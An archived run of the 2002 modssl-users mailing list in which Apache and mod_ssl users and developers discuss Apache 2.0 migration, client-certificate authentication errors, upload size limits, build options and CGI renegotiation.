> in the remote machine definition solves the problem. I dont know >if it is the best solution. > >Bye No it does not use any configuration at http.conf... i can detect if apache was started with -DSSL using ap_exists_config_define("SSL"). But i dont want to disable my module if -DSSL. I want to make my module work on encrypted sessions. Is the any subprocces key to modify in order request is read unencrypted form my fd_in once i have read it encrypted from the original socket and dumped to my file? Thx for your time :) .-rf _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 16:17:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA15160; Tue, 9 Apr 2002 16:16:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA15117; Tue, 9 Apr 2002 16:15:15 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 166D04CE74F; Tue, 9 Apr 2002 16:15:13 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g39EEAA35855; Tue, 9 Apr 2002 16:14:10 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from di.unito.it id LAA23647; Tue, 9 Apr 2002 11:48:34 +0200 (MET DST) Message-ID: <3CB2B8CF.F8E7AC6D@di.unito.it> Date: Tue, 09 Apr 2002 11:47:59 +0200 From: Rabellino Sergio Organization: Dipartimento di Informatica di Torino X-Mailer: Mozilla 4.79 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: RePost: Error 403 with Client Authentication - modssl 2.8.8 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-AntiVirus: Scanned for viruses by VirusFinder @2001-tecnici@di.unito.it - Email Clean Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rabellino Sergio X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sorry for my repost, but we continue to get an error if requesting an automatic listing from a directory under Client Authentication with FakeBasicAuth enabled. We are using successfully an old release (Apache 1.3.14 / ModSSL 2.7.1 / OpenSSL 0.9.6), now we would to upgrade our apache engine for the bugfixes, but even with the 1.2.23/2.8.7 or the 1.3.24/2.8.8 releases, we got errors "Access Forbidden", with the old config files. Note that we have these errors persistently and ONLY IF client Authentication is done with a certificate; if we pass a login/password, we get the Directory Listing or DirectoryIndex as usual. So we believe that there is some tricks about mod_ssl unknown to us... or is a bug ? Thanks. -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 16:17:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA15167; Tue, 9 Apr 2002 16:16:17 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA15104; Tue, 9 Apr 2002 16:15:12 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id A2BA64CE751; Tue, 9 Apr 2002 16:15:11 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g39EDQf35843; Tue, 9 Apr 2002 16:13:26 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id DAA01894; Tue, 9 Apr 2002 03:36:08 +0200 (MET DST) Date: Tue, 9 Apr 2002 03:36:08 +0200 (MET DST) Message-Id: <200204090136.DAA01894@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] SSL problem question (PR#692) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 8 Apr 2002 modssl-bugdb@modssl.org wrote: > Hi my name is Jaymes Redus and I work with Affliated Computer Systems > here in Tallahassee, I just wanted to ask a question concerning a SSL > issue that we are having. We are having a problem with our Upload > functionality on our Web Application. It seems that if a customer tries > to upload a file or text file(encrypted) that's under 57 MB it works > fine but if the file is 58 MB(encrypted) or higher the upload fails. Several Win32 system calls have (ridiculous) hidden limits right around the 56-57MB limit. Among the ones I've seen that fail when passed more data than that in a single call: WriteFile() TransmitFile() I'm willing to bet you're using WriteFile(). If so, make sure you check its return code for errors. You'll get back something like ERROR_INSUFFICIENT_RESOURCES (or something like that, I don't remember exactly what it is off the top of my head). You'd have to loop on the WriteFile() call and pass it bite-sized chunks to get it to work. But in general, do you really want a web application buffering that much in memory? Surely not. --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 16:23:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA15603; Tue, 9 Apr 2002 16:22:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id QAA15559; Tue, 9 Apr 2002 16:21:29 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 2C635BD2D; Tue, 9 Apr 2002 09:27:30 +0200 (CEST) Date: Tue, 9 Apr 2002 09:27:30 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL Message-ID: <20020409072730.GC20897@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <001901c1df46$a32b4030$ec1c2782@eng.lsu.edu> <3CB21735.E9101078@netmask.it> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3CB21735.E9101078@netmask.it> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Apr 09, 2002 at 01:18:29AM +0300, Eli Marmor wrote: > Anyway, the fact is that all of the discussions regarding 2.0 are done > in the new-httpd list, and not here (at least till this thread). So it > is clear that something must be done. Maybe a request to new-httpd > subscribers to move the SSL discussions to here? > User discussion/support was never welcome on new-httpd, so I'm sure that at least the user part of modssl discussions won't stay there. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 16:23:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA15609; Tue, 9 Apr 2002 16:22:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id QAA15560; Tue, 9 Apr 2002 16:21:30 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id E254BBD2A; Mon, 8 Apr 2002 20:58:14 +0200 (CEST) Date: Mon, 8 Apr 2002 20:58:14 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL Message-ID: <20020408185814.GA24160@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <5606C687D4C7D5119A5800508BF30DB401C04317@mail.rainbow.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C04317@mail.rainbow.com> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Apr 08, 2002 at 11:49:37AM -0700, Lynn Gazis wrote: > What options are needed to "configure," with Apache 2.0, to make sure that > mod_ssl is enabled, and that a particular OpenSSL directory is used? I > tried guessing at the right options, but a look at the httpd.conf file in > the resulting installation suggests that I guessed wrong. > The relevant stuff is: --enable-ssl SSL/TLS support (mod_ssl) --with-ssl=DIR SSL/TLS toolkit (OpenSSL) (you can get a list of options with ./configure --help) vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 16:44:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA16947; Tue, 9 Apr 2002 16:43:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id QAA16905; Tue, 9 Apr 2002 16:42:44 +0200 (MET DST) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16uwpW-0005qZ-00 for modssl-users@modssl.org; Tue, 09 Apr 2002 15:42:42 +0100 Received: from 217.135.255.38 ( [217.135.255.38]) as user nick@localhost by webmail.regiocom.net with HTTP; Tue, 9 Apr 2002 15:42:42 +0100 Message-ID: <1018363362.3cb2fde2b8964@webmail.regiocom.net> Date: Tue, 9 Apr 2002 15:42:42 +0100 From: Nick Miles To: modssl-users@modssl.org Subject: Re: RePost: Error 403 with Client Authentication - modssl 2.8.8 References: <3CB2B8CF.F8E7AC6D@di.unito.it> In-Reply-To: <3CB2B8CF.F8E7AC6D@di.unito.it> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.1 X-Originating-IP: 217.135.255.38 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Nick Miles X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users My guess is a bug...I had the same problem for some time, eventually I found a solution in the archives, I believe it was this one: http://marc.theaimsgroup.com/?l=apache-modssl&m=98995735231070&w=2 So comment out that section of code then recompile and all will be ok. Downside to this will be that the checking for the DN as username to normal basic auth will be allowed through. But Im not sure that worked with it anyhow. Nick Quoting Rabellino Sergio : > Sorry for my repost, > but we continue to get an error if requesting an automatic listing from a > directory under Client Authentication with FakeBasicAuth enabled. > We are using successfully an old release (Apache 1.3.14 / ModSSL 2.7.1 / > OpenSSL 0.9.6), now we would to upgrade our apache engine for the > bugfixes, but even with the 1.2.23/2.8.7 or the 1.3.24/2.8.8 releases, we got > errors "Access Forbidden", with the old config files. > Note that we have these errors persistently and ONLY IF client Authentication > is done with a certificate; if we pass a login/password, we > get the Directory Listing or DirectoryIndex as usual. > > So we believe that there is some tricks about mod_ssl unknown to us... or is > a bug ? > > Thanks. > -- > Dott. Sergio Rabellino ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 16:56:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA17746; Tue, 9 Apr 2002 16:55:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id QAA17717; Tue, 9 Apr 2002 16:54:49 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id BFD31BD2B; Mon, 8 Apr 2002 22:50:36 +0200 (CEST) Date: Mon, 8 Apr 2002 22:50:36 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL Message-ID: <20020408205036.GD24160@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <3CB1FCF8.2C169550@netmask.it> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Apr 08, 2002 at 04:34:12PM -0400, Cliff Woolley wrote: > On Mon, 8 Apr 2002, Eli Marmor wrote: > > > I think that we should open a special mailing list for mod_ssl of > > Apache2. > > My personal opinion would be that most modssl users' questions will be of > the same nature regardless of version. The kinds of questions we get > here: > I agree. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 16:56:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA17760; Tue, 9 Apr 2002 16:55:17 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id QAA17716; Tue, 9 Apr 2002 16:54:49 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id D9A4CBD2C; Tue, 9 Apr 2002 09:20:04 +0200 (CEST) Date: Tue, 9 Apr 2002 09:20:04 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL Message-ID: <20020409072004.GB20897@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <001901c1df46$a32b4030$ec1c2782@eng.lsu.edu> <3CB21735.E9101078@netmask.it> <20020408235143.IMGX18378.mta4-rme.xtra.co.nz@there> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020408235143.IMGX18378.mta4-rme.xtra.co.nz@there> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Apr 09, 2002 at 12:52:26PM +1200, Geoff Thorpe wrote: > I would respectfully suggest that modssl discussions stay here. I don't want > to rag on Apache 2.0, and I'm sure a lot of good things have found their way > into it, but it does not solve a number of issues that I think many people in > production environments would require to push them into a pro-active decision > to migrate. Likewise, it introduces an entirely new base of code with > considerably less real-world mileage than the Apache 1.3.** base, so there's > a non-trivial motivation to *not* migrate unless absolutely necessary. I too could add a whole lot of reasons to not migrate if you're doing SSL. Up to about a week before Apache went GA, there were substantial commits to SSL code which to me makes it an essentially untested module. MAJOR CHANGES lists a substantial number of things that IMHO needs a load of testing and ideally also some code review. A look at the readme file also shows a substantial number of TODOs. modules/ssl/README is worth a look for anyone thinking about a migration. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 17:06:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA18417; Tue, 9 Apr 2002 17:05:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id RAA18334; Tue, 9 Apr 2002 17:04:13 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g39F3S825187 for ; Tue, 9 Apr 2002 11:03:28 -0400 Date: Tue, 9 Apr 2002 11:03:28 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL In-Reply-To: <20020409072004.GB20897@marvin-lnx.int.tele.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 9 Apr 2002, Mads Toftum wrote: > I too could add a whole lot of reasons to not migrate if you're doing SSL. > Up to about a week before Apache went GA, there were substantial commits to > SSL code which to me makes it an essentially untested module. While I can't wholly disagree with you, I will point out that the only way we can ever really consider SSL "tried and true" is if the people _from_this_group_ test it extensively and help us find the problems with it. Your participation is vital... really! Thanks all, Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 17:51:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA20544; Tue, 9 Apr 2002 17:50:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id RAA20514; Tue, 9 Apr 2002 17:49:45 +0200 (MET DST) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g39Fmlq31862 for ; Tue, 9 Apr 2002 18:48:48 +0300 Message-ID: <3CB30D5F.C4C5A47C@netmask.it> Date: Tue, 09 Apr 2002 18:48:47 +0300 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL References: Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Cliff Woolley wrote: > > On Tue, 9 Apr 2002, Mads Toftum wrote: > > > I too could add a whole lot of reasons to not migrate if you're doing SSL. > > Up to about a week before Apache went GA, there were substantial commits to > > SSL code which to me makes it an essentially untested module. > > While I can't wholly disagree with you, I will point out that the only way > we can ever really consider SSL "tried and true" is if the people > _from_this_group_ test it extensively and help us find the problems with > it. Your participation is vital... really! This, exactly, was one of my intentions when I opened this thread. BTW: Great article about 2.0, Cliff! (IIRC, it was Linux Magazine). -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 18:47:49 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA24441; Tue, 9 Apr 2002 18:46:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id SAA24419; Tue, 9 Apr 2002 18:45:50 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g39Gj5625276 for ; Tue, 9 Apr 2002 12:45:05 -0400 Date: Tue, 9 Apr 2002 12:45:05 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL In-Reply-To: <3CB30D5F.C4C5A47C@netmask.it> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 9 Apr 2002, Eli Marmor wrote: > This, exactly, was one of my intentions when I opened this thread. Glad to hear it. :) > BTW: Great article about 2.0, Cliff! (IIRC, it was Linux Magazine). Thanks! It's good to know that people got something out of it. PS: for anyone else who's interested but missed it, it just recently became available online at linux-mag.com. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 19:17:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA26066; Tue, 9 Apr 2002 19:16:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-r10.mx.aol.com id TAA26058; Tue, 9 Apr 2002 19:15:55 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-r10.mx.aol.com (mail_out_v32.5.) id m.ef.38322e8 (16214) for ; Tue, 9 Apr 2002 13:15:16 -0400 (EDT) Received: from netscape.com (mow-m22.webmail.aol.com [64.12.180.138]) by air-in01.mx.aol.com (v84.14) with ESMTP id MAILININ12-0409131516; Tue, 09 Apr 2002 13:15:16 -0400 Date: Tue, 09 Apr 2002 13:16:44 -0400 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: Re: Apache 2.0 and SSL Message-ID: <686CA194.49A32DEE.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I, for one, would be more than happy to use Apache 2.0. BUT, I need mod_ssl to function and as I understand it, mod_ssl applications cannot cope with cgi, so I really have no place to start. Running without the nedd for https, I have been VERY impressed with Apache 2.0's speed and efficiency, and would love to work with it, but I have to have the basic tools available to go the next step. George -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 19:59:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA27699; Tue, 9 Apr 2002 19:58:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id TAA27677; Tue, 9 Apr 2002 19:57:26 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g39Hufj25333 for ; Tue, 9 Apr 2002 13:56:41 -0400 Date: Tue, 9 Apr 2002 13:56:41 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Apache 2.0 and SSL In-Reply-To: <686CA194.49A32DEE.009AA07D@netscape.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 9 Apr 2002, George Walsh wrote: > I, for one, would be more than happy to use Apache 2.0. BUT, I need > mod_ssl to function and as I understand it, mod_ssl applications cannot > cope with cgi, so I really have no place to start. Just to clarify for those who might be listening and didn't follow George's earlier posts, Apache 2.0 handles https: requests to CGI's perfectly fine. EXCEPT when you try to configure it to renegotiate on a POST request (which could happen if, say, your cgi-bin directory had per-directory SSL parameters set (eg SSLProtocol or requiring a client certificate)). [As a bit of historical reference, those of you who've been around for a while will recall that mod_ssl for Apache 1.3 had the same problem (worse, actually... it just gave an I/O error) until version 2.3.10, when the method not allowed response an experimental workaround were put in. It remained available only with --enable-rule=SSL_EXPERIMENTAL up until version 2.5.0.] --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 20:06:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA28383; Tue, 9 Apr 2002 20:05:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-d09.mx.aol.com id UAA28369; Tue, 9 Apr 2002 20:04:59 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-d09.mx.aol.com (mail_out_v32.5.) id m.19.371dc61 (22682) for ; Tue, 9 Apr 2002 14:04:17 -0400 (EDT) Received: from netscape.com (mow-m24.webmail.aol.com [64.12.137.1]) by air-in04.mx.aol.com (v84.14) with ESMTP id MAILININ43-0409140417; Tue, 09 Apr 2002 14:04:17 -0500 Date: Tue, 09 Apr 2002 14:04:17 -0400 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: RE: Re: Apache 2.0 and SSL Message-ID: <1B7E9FF4.62CD3005.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for clarifying this for the group, Cliff. Our 'hangup' was admittedly a little specific, and I am working my way around that right now - if for no other reason than to reduce the updating cycle. (Yeah, I still cannot love distribution rpms! May the Good Lord forgive my intransigence :-) George Cliff Woolley wrote: >On Tue, 9 Apr 2002, George Walsh wrote: > >> I, for one, would be more than happy to use Apache 2.0. BUT, I need >> mod_ssl to function and as I understand it, mod_ssl applications cannot >> cope with cgi, so I really have no place to start. > >Just to clarify for those who might be listening and didn't follow >George's earlier posts, Apache 2.0 handles https: requests to CGI's >perfectly fine. EXCEPT when you try to configure it to renegotiate on a >POST request (which could happen if, say, your cgi-bin directory had >per-directory SSL parameters set (eg SSLProtocol or requiring a client >certificate)). > >[As a bit of historical reference, those of you who've been around for a >while will recall that mod_ssl for Apache 1.3 had the same problem (worse, >actually... it just gave an I/O error) until version 2.3.10, when the >method not allowed response an experimental workaround were put in. It >remained available only with --enable-rule=SSL_EXPERIMENTAL up until >version 2.5.0.] > >--Cliff > > >-------------------------------------------------------------- > Cliff Woolley > cliffwoolley@yahoo.com > Charlottesville, VA > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 20:09:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA28534; Tue, 9 Apr 2002 20:08:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id UAA28490; Tue, 9 Apr 2002 20:07:17 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g39I7FQ32850 for ; Tue, 9 Apr 2002 13:07:15 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020409130719.018ede80@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Tue, 09 Apr 2002 13:07:19 -0500 To: modssl-users@modssl.org From: Server Admin Subject: Need mod_ssl to install with existing Apache Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am running FBSD 4.5-stable with Apache-1.3.23 with numerous mods and other dependents all set, configured & running okay. BUT, now need SSL and must install just the mod_ssl without any other changes, except OpenSSH that I (believe?) I can activate from the base system. Being this is my first time to try this type of install and I don't want to mess up the existing system (it's built for production and time is of essence), I would appreciate the advice on the exact steps to install the tarball mod_ssl-2.8.7-1.3.23.tar.gz now to set up SSL. I assume it involves the use of pkg_add, etc., but unsure about each step and the right syntax. This looks like my best place to ask for this help, please (please).... many thanks in advance. .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 20:20:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA29062; Tue, 9 Apr 2002 20:19:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) 